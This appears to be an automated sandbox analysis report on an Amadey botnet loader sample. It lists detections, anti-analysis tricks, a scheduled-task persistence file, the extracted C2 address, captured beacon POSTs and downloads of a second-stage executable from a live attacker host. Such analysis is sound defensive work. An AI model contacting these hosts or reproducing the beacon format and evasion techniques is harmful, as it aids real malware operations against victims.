Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1502468
MD5:	0f2694844eb16391e15196e17e545f0b
SHA1:	cb6cbd6a90349afa4624a221b3350af44feb4d71
SHA256:	53f9b3b2ea25424baf94da442973f4efd71e1218a3b837600334d97898ebfd7e
Tags:	exe
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0F2694844EB16391E15196E17E545F0B)

explorti.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" MD5: 0F2694844EB16391E15196E17E545F0B)

explorti.exe (PID: 7456 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 0F2694844EB16391E15196E17E545F0B)

explorti.exe (PID: 8104 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 0F2694844EB16391E15196E17E545F0B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1699866762.0000000004D10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000003.1699390143.0000000004D20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1740065067.0000000000531000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000003.2279702263.0000000005070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1711456271.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.1739755921.0000000000531000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1670647097.0000000004870000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.explorti.exe.530000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.explorti.exe.530000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.explorti.exe.530000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.d60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-09-01T17:37:04.208529+0200
SID:	2856147
Severity:	1
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.4

Timestamp:	2024-09-01T17:37:19.841016+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49775
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.19/Vi9leo/index.phpO	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exeded	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe6522427f	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php0	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpWindows	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php00	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpb	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500m	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exel	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe00	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exem32	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpoft	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpw_b	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php0=	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: explorti.exe.8104.6.memstrmin

Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49775 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49775

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.19

Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000052000&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000052000&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000052000&unit=246122658369

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0053BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_0053BD60

Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500m
Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe00
Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe6522427f
Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeded
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exel
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exem32
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php00
Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0=
Source: explorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpO
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpb
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpw_b

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0053E440	6_2_0053E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00573068	6_2_00573068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00534CF0	6_2_00534CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00567D83	6_2_00567D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0057765B	6_2_0057765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00534AF0	6_2_00534AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0057777B	6_2_0057777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00576F09	6_2_00576F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00578720	6_2_00578720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00572BD0	6_2_00572BD0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

